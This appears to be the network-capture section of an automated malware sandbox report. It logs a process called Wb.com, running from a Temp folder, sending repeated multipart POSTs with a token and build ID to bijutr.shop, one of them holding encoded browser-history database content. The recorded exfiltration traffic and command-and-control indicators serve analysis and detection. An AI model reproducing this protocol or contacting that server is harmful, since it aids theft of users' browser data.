                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:45 GMT
                                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49808 | 172.217.21.36 | 443 | 5648 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:44 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
2024-12-23 16:14:45 UTC | 933 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Version: 705503573
                                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:45 GMT
                                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
2024-12-23 16:14:45 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-23 16:14:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49831 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:49 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----F3E37GL6XLN7YU3OPP89
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 505
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-23 16:14:49 UTC | 505 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 46 33 45 33 37 47 4c 36 58 4c 4e 37 59 55 33 4f 50 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 46 33 45 33 37 47 4c 36 58 4c 4e 37 59 55 33 4f 50 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 46 33 45 33 37 47 4c 36 58 4c 4e 37 59 55 33 4f 50 50 38 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------F3E37GL6XLN7YU3OPP89Content-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------F3E37GL6XLN7YU3OPP89Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------F3E37GL6XLN7YU3OPP89Cont
2024-12-23 16:14:50 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:50 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
2024-12-23 16:14:50 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49836 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:50 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----00RQI5FKFUSJMYU379R9
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 213453
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-23 16:14:50 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 30 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 30 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 30 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------00RQI5FKFUSJMYU379R9Content-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------00RQI5FKFUSJMYU379R9Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------00RQI5FKFUSJMYU379R9Cont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:50 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Timestamp: 2024-12-23 16:14:52 UTC
Bytes transferred: 158
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:14:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID: 17
Source IP: 192.168.2.6
Source Port: 49841
Destination IP: 188.245.216.205
Destination Port: 443
PID: 2744
Process: C:\Users\user\AppData\Local\Temp\623615\Wb.com

Timestamp: 2024-12-23 16:14:52 UTC
Bytes transferred: 325
Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DT0R1DB1NYCBIMYUKF3W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: 2024-12-23 16:14:52 UTC
Bytes transferred: 16355
Direction: OUT
Data Ascii: ------DT0R1DB1NYCBIMYUKF3WContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------DT0R1DB1NYCBIMYUKF3WContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------DT0R1DB1NYCBIMYUKF3WCont
Timestamp: 2024-12-23 16:14:54 UTC
Bytes transferred: 158
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:14:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Timestamp: 2024-12-23 16:14:54 UTC
Bytes transferred: 12
Direction: IN
Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID: 18
Source IP: 192.168.2.6
Source Port: 49847
Destination IP: 188.245.216.205
Destination Port: 443
PID: 2744
Process: C:\Users\user\AppData\Local\Temp\623615\Wb.com

Timestamp: 2024-12-23 16:14:54 UTC
Bytes transferred: 326
Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----E37YCBIEU37YUA1689HV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: 2024-12-23 16:14:54 UTC
Bytes transferred: 16355
Direction: OUT
Data Ascii: ------E37YCBIEU37YUA1689HVContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------E37YCBIEU37YUA1689HVContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------E37YCBIEU37YUA1689HVCont
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:54 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 16:14:56 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:14:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 16:14:56 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 49849 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:14:55 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----E37YCBIEU37YUA1689HV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 493
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 16:14:55 UTC | 493 | OUT | Data Ascii: ------E37YCBIEU37YUA1689HVContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------E37YCBIEU37YUA1689HVContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------E37YCBIEU37YUA1689HVCont
2024-12-23 16:14:56 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:14:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 16:14:56 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 49875 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:02 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EK689ZM79H47YMGD2VA1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 3165
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 16:15:02 UTC | 3165 | OUT | Data Ascii: ------EK689ZM79H47YMGD2VA1Content-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------EK689ZM79H47YMGD2VA1Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------EK689ZM79H47YMGD2VA1Cont
2024-12-23 16:15:03 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:15:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 16:15:03 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 49888 | 188.245.216.205 | 443 | 2744 | C:\Users\user\AppData\Local\Temp\623615\Wb.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 16:15:03 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----MGD2NY5P8Q9RQIMYUSJE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 207993
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 16:15:03 UTC | 16355 | OUT | Data Ascii: ------MGD2NY5P8Q9RQIMYUSJEContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------MGD2NY5P8Q9RQIMYUSJEContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------MGD2NY5P8Q9RQIMYUSJECont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                                      Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 16:15:05 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 16:15:05 GMT
